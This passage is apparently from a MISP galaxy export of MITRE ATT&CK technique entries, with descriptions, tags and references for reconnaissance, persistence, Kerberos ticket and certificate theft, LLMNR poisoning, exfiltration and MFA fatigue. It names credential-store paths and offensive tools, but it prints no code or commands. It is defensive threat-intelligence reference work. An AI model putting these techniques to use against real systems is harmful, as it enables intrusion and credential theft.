Determining if a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)

The tag is: misp-galaxy:mitre-attack-pattern="Determine centralization of IT management - T1285"

Table 5431. Table References

Links

https://attack.mitre.org/techniques/T1285

Determine external network trust dependencies - T1259

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1259).

Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)

The tag is: misp-galaxy:mitre-attack-pattern="Determine external network trust dependencies - T1259"

Table 5432. Table References

Links

https://attack.mitre.org/techniques/T1259

Analyze organizational skillsets and deficiencies - T1297

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1297).

Understanding organizational skillsets and deficiencies could provide insight in to weakness in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297"

Analyze organizational skillsets and deficiencies - T1297 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300" with estimative-language:likelihood-probability="almost-certain"

Table 5433. Table References

Links

https://attack.mitre.org/techniques/T1297

Analyze architecture and configuration posture - T1288

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1288).

An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze architecture and configuration posture - T1288"

Table 5434. Table References

Links

https://attack.mitre.org/techniques/T1288

Analyze organizational skillsets and deficiencies - T1289

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1289).

Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289"

Analyze organizational skillsets and deficiencies - T1289 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300" with estimative-language:likelihood-probability="almost-certain"

Table 5435. Table References

Links

https://attack.mitre.org/techniques/T1289

Leverage compromised 3rd party resources - T1375

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)

The tag is: misp-galaxy:mitre-attack-pattern="Leverage compromised 3rd party resources - T1375"

Table 5436. Table References

Links

https://attack.mitre.org/techniques/T1375

Procure required equipment and software - T1335

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1335).

An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)

The tag is: misp-galaxy:mitre-attack-pattern="Procure required equipment and software - T1335"

Table 5437. Table References

Links

https://attack.mitre.org/techniques/T1335

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

SSL certificate acquisition for domain - T1337

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1337).

Certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user in to trusting the domain (e.g., vvachovia instead of [Wachovia](https://www.wellsfargo.com/about/corporate/wachovia) — homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)

The tag is: misp-galaxy:mitre-attack-pattern="SSL certificate acquisition for domain - T1337"

Table 5438. Table References

Links

https://attack.mitre.org/techniques/T1337

https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/

Confirmation of launched compromise achieved - T1383

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)

The tag is: misp-galaxy:mitre-attack-pattern="Confirmation of launched compromise achieved - T1383"

Table 5439. Table References

Links

https://attack.mitre.org/techniques/T1383

App Delivered via Email Attachment - T1434

The application is delivered as an email attachment.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="App Delivered via Email Attachment - T1434"

App Delivered via Email Attachment - T1434 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 5440. Table References

Links

https://attack.mitre.org/techniques/T1434

Create or Modify System Process - T1543

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons)

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)

The tag is: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543"

Table 5441. Table References

Links

https://attack.mitre.org/techniques/T1543

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://technet.microsoft.com/en-us/library/cc772408.aspx

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

Build and configure delivery systems - T1347

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1347).

Delivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Build and configure delivery systems - T1347"

Table 5442. Table References

Links

https://attack.mitre.org/techniques/T1347

Automated system performs requested action - T1384

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Users may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. (Citation: WSUSpect2015)

The tag is: misp-galaxy:mitre-attack-pattern="Automated system performs requested action - T1384"

Table 5443. Table References

Links

https://attack.mitre.org/techniques/T1384

Exfiltration Over Other Network Medium - T1438

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a standard Internet connection, the exfiltration may occur, for example, via Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1438"

Table 5444. Table References

Links

https://attack.mitre.org/techniques/T1438

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html

Eavesdrop on Insecure Network Communication - T1439

If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)

The tag is: misp-galaxy:mitre-attack-pattern="Eavesdrop on Insecure Network Communication - T1439"

Table 5445. Table References

Links

https://attack.mitre.org/techniques/T1439

https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html

Distribute malicious software development tools - T1394

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1394).

An adversary could distribute malicious software development tools (e.g., compiler) that hide malicious behavior in software built using the tools. (Citation: PA XcodeGhost) (Citation: Reflections on Trusting Trust)

The tag is: misp-galaxy:mitre-attack-pattern="Distribute malicious software development tools - T1394"

Table 5446. Table References

Links

https://attack.mitre.org/techniques/T1394

Transfer Data to Cloud Account - T1537

Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537"

Table 5447. Table References

Links

https://attack.mitre.org/techniques/T1537

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html

https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview

https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature

https://www.justice.gov/file/1080281/download

Review logs and residual traces - T1358

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1358).

Execution of code and network communications often result in logging or other system or network forensic artifacts. An adversary can run their code to identify what is recorded under different conditions. This may result in changes to their code or adding additional actions (such as deleting a record from a log) to the code. (Citation: EDB-39007) (Citation: infosec-covering-tracks)

The tag is: misp-galaxy:mitre-attack-pattern="Review logs and residual traces - T1358"

Table 5448. Table References

Links

https://attack.mitre.org/techniques/T1358

Runtime code download and execution - T1395

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted applications for malicious behavior. However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Runtime code download and execution - T1395"

Table 5449. Table References

Links

https://attack.mitre.org/techniques/T1395

Test malware to evade detection - T1359

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1359).

An adversary can run their code on systems with cyber security protections, such as antivirus products, in place to see if their code is detected. They can also test their malware on freely available public services. (Citation: MalwareQAZirtest)

The tag is: misp-galaxy:mitre-attack-pattern="Test malware to evade detection - T1359"

Table 5450. Table References

Links

https://attack.mitre.org/techniques/T1359

Replace legitimate binary with malware - T1378

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Replacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)

The tag is: misp-galaxy:mitre-attack-pattern="Replace legitimate binary with malware - T1378"

Table 5451. Table References

Links

https://attack.mitre.org/techniques/T1378

Compromise of externally facing system - T1388

This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.

Externally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and boarder routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. (Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise of externally facing system - T1388"

Table 5452. Table References

Links

https://attack.mitre.org/techniques/T1388

Boot or Logon Initialization Scripts - T1398

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1398"

Table 5453. Table References

Links

https://attack.mitre.org/techniques/T1398

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://source.android.com/security/verifiedboot/

Boot or Logon Autostart Execution - T1547

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547"

Table 5454. Table References

Links

http://msdn.microsoft.com/en-us/library/aa376977

https://attack.mitre.org/techniques/T1547

https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order

https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

Remotely Track Device Without Authorization - T1468

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google’s Android Device Manager or Apple iCloud’s Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Track Device Without Authorization - T1468"

Table 5455. Table References

Links

https://attack.mitre.org/techniques/T1468

https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html

Steal or Forge Authentication Certificates - T1649

Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)

Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)

Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate’s validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.

Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)

The tag is: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649"

Table 5456. Table References

Links

https://attack.mitre.org/techniques/T1649

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)

https://github.com/GhostPack/SharpDPAPI#certificates

https://github.com/TheWover/CertStealer

https://o365blog.com/post/deviceidentity/

https://posts.specterops.io/certified-pre-owned-d95910965cd2

https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming

Remotely Wipe Data Without Authorization - T1469

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google’s Android Device Manager or Apple iCloud’s Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Wipe Data Without Authorization - T1469"

Table 5457. Table References

Links

https://attack.mitre.org/techniques/T1469

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html

https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/

Install Insecure or Malicious Configuration - T1478

An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile).

For example, an unwanted Certification Authority (CA) certificate could be placed in the device’s trusted certificate store, increasing the device’s susceptibility to adversary-in-the-middle network attacks seeking to eavesdrop on or manipulate the device’s network communication ([Eavesdrop on Insecure Network Communication](https://attack.mitre.org/techniques/T1439) and [Manipulate Device Communication](https://attack.mitre.org/techniques/T1463)).

On iOS, malicious Configuration Profiles could contain unwanted Certification Authority (CA) certificates or other insecure settings such as unwanted proxy server or VPN settings to route the device’s network traffic through an adversary’s system. The device could also potentially be enrolled into a malicious Mobile Device Management (MDM) system (Citation: Talos-MDM).

The tag is: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"

Table 5458. Table References

Links

https://attack.mitre.org/techniques/T1478

https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html

https://www.symantec.com/connect/blogs/malicious-profiles-sleeping-giant-ios-security

Steal or Forge Kerberos Tickets - T1558

Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.

On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)

Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user’s session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)

Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller’s environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple’s native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user’s TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)

The tag is: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558"

Table 5459. Table References

Links

http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html

https://adsecurity.org/?p=1515

https://adsecurity.org/?p=227

https://adsecurity.org/?p=2293

https://attack.mitre.org/techniques/T1558

https://blog.stealthbits.com/detect-pass-the-ticket-attacks

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

https://docs.microsoft.com/windows-server/administration/windows-commands/klist

https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285

https://github.com/gentilkiwi/kekeo

https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f

https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html

https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html

Aggregate individual’s digital footprint - T1275

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1275).

In addition to a target’s social media presence may exist a larger digital footprint, such as accounts and credentials on e-commerce sites or usernames and logins for email. An adversary familiar with a target’s username can mine to determine the target’s larger digital footprint via publicly available sources. (Citation: DigitalFootprint) (Citation: trendmicro-vtech)

The tag is: misp-galaxy:mitre-attack-pattern="Aggregate individual’s digital footprint - T1275"

Table 5460. Table References

Links

https://attack.mitre.org/techniques/T1275

Domain Generation Algorithms (DGA) - T1323

This technique has been deprecated. Please use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002).

The use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. (Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms (DGA) - T1323"

Table 5461. Table References

Links

https://attack.mitre.org/techniques/T1323

Unconditional client-side exploitation/Injected Website/Driveby - T1372

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit’s landing page. The exploit kit landing page will probe the victim’s operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)

The tag is: misp-galaxy:mitre-attack-pattern="Unconditional client-side exploitation/Injected Website/Driveby - T1372"

Table 5462. Table References

Links

https://attack.mitre.org/techniques/T1372

LLMNR/NBT-NS Poisoning and Relay - T1171

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)

Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)

The tag is: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171"

Table 5463. Table References

Links

https://attack.mitre.org/techniques/T1171

https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution

https://github.com/Kevin-Robertson/Conveigh

https://github.com/SpiderLabs/Responder

https://github.com/nomex/nbnspoof

https://technet.microsoft.com/library/cc958811.aspx

https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning

OS-vendor provided communication channels - T1390

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1390).

Google and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)

The tag is: misp-galaxy:mitre-attack-pattern="OS-vendor provided communication channels - T1390"

Table 5464. Table References

Links

https://attack.mitre.org/techniques/T1390

Multi-Factor Authentication Request Generation - T1621

Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.

In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Request Generation - T1621"

Table 5465. Table References

Links

https://attack.mitre.org/techniques/T1621

https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications

https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/

